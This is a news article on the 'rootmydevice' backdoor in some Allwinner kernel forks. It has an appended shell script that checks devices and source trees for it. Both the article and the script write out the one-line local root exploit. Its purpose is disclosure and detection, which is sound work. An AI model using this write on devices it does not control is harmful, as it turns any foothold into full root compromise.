Some Allwinner Kernel Forks Contain Easy Root Exploit

By Daniel Fuller May 12, 2016, 8:11am
Chinese chipmaker and device OEM Allwinner, which recently unveiled a laptop of its own, competes with MediaTek in the budget space but holds a smaller share of it. Its chips usually end up in very cheap phones, handheld game consoles, TV sticks and hobbyist single-board computers. That low profile means its vendor kernel gets little community scrutiny, which is why a flaw in several versions of its in-house kernel fork only recently came to light. The discovery was made by Armbian, a Debian- and Ubuntu-based Linux distribution built for ARM single-board computers such as the Allwinner-powered Orange Pi boards (the Raspberry Pi uses Broadcom chips and is not involved here).

The backdoor is simple and, thankfully, sits in plain sight and is easy to patch. Whether left in deliberately or something that slipped through quality control, some versions of Allwinner's ARM kernel fork ship a debugging module that exposes a file, /proc/sunxi_debug/sunxi_debug. "rootmydevice" is not an instruction but a magic string: any local process that writes it to that file has its credentials switched to root, with no further checks. Because any user can write to the file, anything that can already run code on the device (an app, a compromised service, a shell opened over the network) can escalate to root in one line. The bug is not remotely exploitable on its own, but it turns any foothold into a full compromise. It is not present in every device with an Allwinner chip, only in a subset of chips used mostly in Orange Pi style single-board computers and in a few Android device trees. The module prints a message to the device log at boot and is easy to find in the source, including Allwinner's own GitHub repositories, which argues against deliberate malice. Most likely it is debugging code that was never removed before release; it may also have been left in as a convenience for users who want root on their own hardware. Either way, Allwinner has said little about the issue.

As of this writing the code has not been removed from Allwinner's own kernel repositories (mainline Linux never contained it), so if you own an affected device you will have to wait for a vendor or community update. If you build the kernel yourself from Allwinner's sources, for instance for your own Linux variant for ARM devices, grep the tree for rootmydevice (or for sunxi_debug) and drop the module, or leave it out of your kernel configuration. To check a running device, open a terminal or an adb shell as an unprivileged user, run id to note your uid, then issue the following command (without any outer quotes):

echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

and run id again. If the file does not exist, the module is not present and the device is not affected. If you are greeted with a message saying you now have root privileges, and id reports uid 0, your device has the backdoor. For full details on the Armbian community's findings, head through the source link.
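The same check as a script, added here as an example and not taken from Armbian's report or Allwinner's code. It assumes the proc node path above (overridable through SUNXI_DEBUG_NODE), a POSIX id -u, and that it is run as an unprivileged user on the device from a local terminal or adb shell. It deliberately uses the shell's builtin printf for the write, because the backdoor re-credentials the process that performs the write, and with an external echo that would be a short-lived child rather than the shell you are testing from. The source-tree grep is for people building from Allwinner's repositories; the file name check_rootmydevice.sh is an assumption.

```sh
#!/bin/sh
# Added example: check a device (or a kernel source tree) for the sunxi-debug
# "rootmydevice" backdoor. Not Armbian's or Allwinner's code.
# Assumes the proc node path reported by Armbian; override with SUNXI_DEBUG_NODE.

SUNXI_DEBUG_NODE="${SUNXI_DEBUG_NODE:-/proc/sunxi_debug/sunxi_debug}"

# 0 if the debug node exists, i.e. the sunxi-debug module is in the running kernel.
sunxi_debug_present() {
    [ -e "$1" ]
}

# Write the magic string and see whether this shell's uid changed.
# printf must be a shell builtin (it is in sh, bash, dash and Android's mksh):
# the backdoor changes the credentials of the *writing* process.
# Return: 0 = vulnerable (uid became 0), 1 = not vulnerable, 2 = inconclusive.
rootmydevice_test() {
    node="$1"
    before=$(id -u)
    if [ "$before" = "0" ]; then
        echo "already root: run this as an unprivileged user" >&2
        return 2
    fi
    if ! sunxi_debug_present "$node"; then
        echo "$node does not exist: sunxi-debug not present, not vulnerable"
        return 1
    fi
    # This write *is* the exploit; on an affected kernel the caller becomes root.
    printf 'rootmydevice\n' > "$node" 2>/dev/null || true
    after=$(id -u)
    if [ "$after" = "0" ]; then
        echo "VULNERABLE: uid changed from $before to 0 after writing to $node"
        return 0
    fi
    echo "write accepted but uid is still $after: no escalation"
    return 1
}

# For people building from Allwinner's kernel sources: list files that contain
# the magic string. Returns 0 (and prints paths) if found, 1 if the tree is clean.
source_has_rootmydevice() {
    grep -rl 'rootmydevice' "$1" 2>/dev/null
}

# Entry point when saved as check_rootmydevice.sh and executed directly:
#   sh check_rootmydevice.sh                       # tests the running kernel
#   sh check_rootmydevice.sh /path/to/kernel/src   # greps a source tree
run_checks() {
    if [ "${1:-}" ]; then
        if source_has_rootmydevice "$1"; then
            echo "backdoor present in source tree $1"
        else
            echo "no rootmydevice string under $1"
        fi
    else
        rootmydevice_test "$SUNXI_DEBUG_NODE"
    fi
}

[ "${0##*/}" = "check_rootmydevice.sh" ] && run_checks "$@"
```

The script exits 0 from rootmydevice_test only when the uid actually changed, so it can be dropped into a fleet check or a CI job that boots a build in the device and fails it when the backdoor is present. A non-root uid is no guarantee on its own, since a kernel could carry the module at a different path; the grep over the source tree is the authoritative check when you have the sources.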

Source: Armbian Via: Ars Technica